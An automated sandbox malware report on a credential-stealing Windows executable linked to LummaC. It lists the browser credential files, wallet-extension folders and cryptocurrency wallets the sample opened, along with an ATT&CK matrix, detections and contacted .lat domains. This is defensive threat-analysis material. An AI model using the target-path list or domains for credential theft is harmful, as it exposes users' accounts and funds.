                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1998585611.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1998932614.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1998797783.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1998637407.00000000019E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: gJkNLYV0ax.exe PID: 7308, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match File source: Process Memory Space: gJkNLYV0ax.exe PID: 7308, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the match count shown in the report for that technique)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Defense Evasion: Virtualization/Sandbox Evasion (34); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                Discovery: Query Registry (1); Security Software Discovery (751); Virtualization/Sandbox Evasion (34); Process Discovery (2); File and Directory Discovery (2); System Information Discovery (223)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
                Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
                Source            Detection   Scanner          Label
                gJkNLYV0ax.exe    57%         Virustotal
                gJkNLYV0ax.exe    66%         ReversingLabs    Win32.Trojan.Symmi
                gJkNLYV0ax.exe    100%        Avira            TR/Crypt.XPACK.Gen
                gJkNLYV0ax.exe    100%        Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Name              IP              Active     Malicious   Antivirus Detection   Reputation
                discokeyus.lat    104.21.21.99    true       false                             high
                grannyejh.lat     unknown         unknown    false                             high
                sweepyribs.lat    unknown         unknown    false                             high
                Name                           Malicious   Antivirus Detection   Reputation
                necklacebudi.lat               false                             high
                https://discokeyus.lat/api     false                             high
                aspecteirs.lat                 false                             high
                sweepyribs.lat                 false                             high
                sustainskelet.lat              false                             high
                crosshuaht.lat                 false                             high
                rapeflowwj.lat                 false                             high
                energyaffai.lat                false                             high
                grannyejh.lat                  false                             high
                discokeyus.lat                 false                             high
IP           | Domain         | Country       | ASN   | ASN Name        | Malicious
104.21.21.99 | discokeyus.lat | United States | 13335 | CLOUDFLARENETUS | false
                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1578918
                                                                                                                          Start date and time:2024-12-20 16:38:21 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 4m 31s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:4
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:gJkNLYV0ax.exe
                                                                                                                          renamed because original name is a hash value
                                                                                                                          Original Sample Name:f158cdb34eb5c4de5eb858cce72f94cb.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@3/1
                                                                                                                          EGA Information:Failed
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          • Number of executed functions: 0
                                                                                                                          • Number of non-executed functions: 3
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Stop behavior analysis, all processes terminated
                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target gJkNLYV0ax.exe, PID 7308 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time     | Type            | Description
10:39:33 | API Interceptor | 40x Sleep call for process: gJkNLYV0ax.exe modified
Match        | Associated Sample Name / URL   | Detection | Threat Name
104.21.21.99 | m21jm5y5Z5.exe                 | malicious | LummaC
             | gEfWplq0xQ.exe                 | malicious | LummaC
             | gNjo8FIKN5.exe                 | malicious | LummaC
             | f48jWpQ2F8.exe                 | malicious | LummaC
             | RZnZbS97dD.exe                 | malicious | LummaC
             | SBLUj2UYnk.exe                 | malicious | LummaC
             | file.exe                       | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT
             | file.exe                       | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
             | k6A01XaeEn.exe                 | malicious | LummaC
             | Inv59895_abubakar.iddrisu.html | malicious | HTMLPhisher
Match | Associated Sample Name / URL | Detection | Threat Name | Context
discokeyus.lat | m21jm5y5Z5.exe | malicious | LummaC | 104.21.21.99
discokeyus.lat | gEfWplq0xQ.exe | malicious | LummaC | 104.21.21.99
discokeyus.lat | gNjo8FIKN5.exe | malicious | LummaC | 104.21.21.99
discokeyus.lat | f4p4BwljZt.exe | malicious | LummaC | 172.67.197.170
discokeyus.lat | Qmg24kMXxU.exe | malicious | LummaC, Stealc | 172.67.197.170
discokeyus.lat | f48jWpQ2F8.exe | malicious | LummaC | 104.21.21.99
discokeyus.lat | R2CgZG545D.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.197.170
discokeyus.lat | ylV1TcJ86R.exe | malicious | LummaC | 172.67.197.170
discokeyus.lat | RZnZbS97dD.exe | malicious | LummaC | 104.21.21.99
discokeyus.lat | SBLUj2UYnk.exe | malicious | LummaC | 104.21.21.99
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | http://northwesthousingservices.discussripped.com | malicious | HTMLPhisher | 104.21.89.240
CLOUDFLARENETUS | mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta | malicious | Cobalt Strike | 104.21.84.67
CLOUDFLARENETUS | m21jm5y5Z5.exe | malicious | LummaC | 104.21.21.99
CLOUDFLARENETUS | gEfWplq0xQ.exe | malicious | LummaC | 104.21.21.99
CLOUDFLARENETUS | gNjo8FIKN5.exe | malicious | LummaC | 104.21.21.99
CLOUDFLARENETUS | securedoc_20241220T070409.html | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | f4p4BwljZt.exe | malicious | LummaC | 172.67.197.170
CLOUDFLARENETUS | Qmg24kMXxU.exe | malicious | LummaC, Stealc | 172.67.197.170
CLOUDFLARENETUS | f48jWpQ2F8.exe | malicious | LummaC | 104.21.21.99
CLOUDFLARENETUS | https://bell36588.yardione.com | malicious | Unknown | 104.17.25.14
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | m21jm5y5Z5.exe | malicious | LummaC | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | gEfWplq0xQ.exe | malicious | LummaC | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | gNjo8FIKN5.exe | malicious | LummaC | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | f4p4BwljZt.exe | malicious | LummaC | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | Qmg24kMXxU.exe | malicious | LummaC, Stealc | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | f48jWpQ2F8.exe | malicious | LummaC | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | R2CgZG545D.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | ylV1TcJ86R.exe | malicious | LummaC | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | RZnZbS97dD.exe | malicious | LummaC | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | SBLUj2UYnk.exe | malicious | LummaC | 104.21.21.99
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.949018797283878
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
